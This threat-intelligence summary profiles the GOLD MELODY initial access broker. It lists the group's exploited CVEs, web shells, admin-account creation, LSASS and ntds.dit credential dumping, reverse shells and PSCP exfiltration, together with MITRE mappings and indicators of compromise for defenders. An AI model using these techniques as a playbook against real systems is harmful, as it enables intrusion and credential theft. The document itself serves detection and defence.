Keypoints
- GOLD MELODY obtains initial access by exploiting unpatched internet-facing applications (e.g., Oracle E-Business, WebLogic, Sitecore, Apache Struts, Log4j/FlexNet).
- Once inside, the group establishes persistence with JSP/ASPX web shells or Perl backdoors (IHS Back-Connect) and creates administrative accounts for ongoing access.
- Tool staging is consistent: threat actors create folders such as C:Windowstemp7fde (or similar) and use Wget/cURL to fetch utilities like wget.bin, 7-Zip, PuTTY, and TxPortMap.
- Extensive discovery and lateral-movement activity uses built-in commands (whoami, ipconfig, netstat, net use) and tools such as TxPortMap, pscan2, PAExec, WinExe, and PsExec-like binaries.
- Credential collection techniques include Mimikatz, LSASS memory dumps via comsvcs MiniDump, Responder, saving registry hives and ntds.dit for offline cracking.
- Command-and-control and remote access were achieved via reverse shells and SOCKS5 tunnels (IHS Back-Connect, AUDITUNNEL), with observed reuse of C2 infrastructure and IPs that hosted named binaries.
- Observed exfiltration used PuTTY/PSCP to move large archives (including ntds.dit) to attacker-controlled IPs; defensive detection often interrupted operations before full objective achievement.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – GOLD MELODY exploited unpatched internet-facing servers (‘…exploits internet-facing vulnerabilities as initial access vectors…’).
- [T1505.003] Web Shell – Used JSP/ASPX web shells for persistence and remote command execution (‘…deployed JSP web shells for persistence…’).
- [T1136] Create Account – Created local admin accounts via net user and added them to administrators (‘…created a “support” account … net localgroup administrators support /add’).
- [T1543] Create or Modify System Process – Installed tools and RATs as services (e.g., winexesvc.exe, wmhost.exe) for remote execution (‘…creates a Windows service executable (winexesvc.exe) … executed two binaries (wmhost.exe and winnta.exe) as Windows services’).
- [T1003] OS Credential Dumping – Harvested credentials via Mimikatz, LSASS memory dumps, saved registry hives and ntds.dit for offline cracking (‘…executed the Mimikatz … dumped the LSASS process memory … saved the Windows System registry hive and the Active Directory database file (ntds.dit)’).
- [T1021] Remote Services (SMB/Admin Shares) – Lateral movement by mapping admin shares and using net use/SMB to access domain controllers (‘…connected to a domain controller via unknown commands to generate an SMB connection … mapping administrative shares’).
- [T1105] Ingress Tool Transfer – Downloaded tools to hosts using Wget and cURL for staging and execution (‘…used Wget to download tools to the staging folder’ and ‘cURL command attempting to download IHS Back-Connect backdoor’).
- [T1041] Exfiltration Over C2 Channel – Exfiltrated data using PuTTY/PSCP to attacker-controlled IPs (‘…observed 3.3 GB of data leaving the network to an attacker-controlled IP address’ via PuTTY Secure Copy Client).
- [T1070.004] Clear Command History – Attempted anti-forensics by prepending a string to Linux commands to prevent saving to Bash_History (‘…string prepended to commands to prevent saving to Bash_History’).
Indicators of Compromise
- [File hash] Perl reverse shell (bc.pl) – c6c1c3d7e25327a6d46039aa837491e5 (MD5), and additional SHA1/SHA256 hashes listed.
- [File hash] AUDITUNNEL binary (auditd.bin) – b53063c59d999ff1a6b8b1fc15f58ffc (MD5), and other SHA1/SHA256 hashes.
- [File hash] Web shell files (2.txt / common_login_bottom2.jsp) – 851aab4341e73f400ab0969cab29298d (MD5), plus other hashes.
- [Filename] Staged tool names – wget.bin, TxPortMap.bin, 7z.bin, bc.pl (used in tool staging and downloads).
- [IP address] C2 / hosting infrastructure – 149.28.193.216, 149.28.207.120 (hosts observed serving wget.bin, TxPortMap.bin, bc.pl, and 7z.bin), and other IPs such as 149.28.207.216, 195.123.240.183, 64.190.113.185.
GOLD MELODY’s technical playbook begins with exploiting unpatched, internet-facing applications (examples observed: Oracle E-Business CVE-2016-0545, Sitecore CVE-2021-42237, Apache Struts CVE-2017-5638, Log4j-related CVEs) to gain initial shell access. After exploitation they confirm access (sometimes using the Burp Suite Collabfiltrator extension) and immediately stage tooling in predictable directories (e.g., C:Windowstemp7fde or WindowsSystem32zh-TW), fetching binaries with Wget/cURL such as wget.bin, TxPortMap.bin, 7z.bin, ps cp/putty components, and custom backdoors (bc.pl).
For persistence and remote control they deploy web shells (JSP/ASPX) or backdoors (Perl IHS Back-Connect, AUDITUNNEL) and install RATs/services (wmhost.exe, winnta.exe/winnta). They perform discovery using built-in commands (whoami, ipconfig, netstat, net user, quser, systeminfo, dir) and scanning tools (TxPortMap, pscan2) to enumerate SMB-accessible hosts, then move laterally via mapped admin shares, PAExec/WinExe, and SMB sessions. Credential harvesting is achieved through Responder, direct /etc/passwd and /etc/shadow access on Linux, dumping LSASS memory (MiniDump via comsvcs.dll), executing Mimikatz (_mo64.bin), and saving registry hives and ntds.dit for offline cracking.
Execution and exfiltration steps use common utilities and covert channels: Wget/cURL for ingress tool transfer, reverse shells and SOCKS5 tunnels for C2 (AUDITUNNEL, IHS Back-Connect), and PuTTY/PSCP to transfer archives (including ntds.dit) to attacker-controlled IPs. The group applies simple anti-forensic measures (preventing commands from writing to Bash_History) and reuses C2 infrastructure and filenames, which defenders can monitor alongside the listed hashes and IPs to detect and disrupt their operations.
Read more: https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker